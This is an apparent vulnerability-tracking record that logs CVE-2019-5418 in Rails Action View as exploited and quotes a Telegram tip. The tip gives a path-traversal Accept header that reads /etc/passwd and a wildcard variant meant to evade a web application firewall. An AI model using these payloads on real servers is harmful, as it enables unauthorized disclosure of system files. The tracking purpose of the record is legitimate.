{"uuid": "611f9f2d-15ed-4965-87cc-41fcc703347d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-5418", "type": "exploited", "source": "https://t.me/suboxone_chatroom/4315", "content": "\u26a0\ufe0fIf your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.\n\nIntercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{ \n\n\ud83d\udecdIf the server is deemed to be vulnerable, but a WAF is present: \n\n../../../../../../e*c/p*s*d{{\n\n\u2714\ufe0fCredit- nav1n0x", "creation_timestamp": "2025-02-28T08:22:28.000000Z"}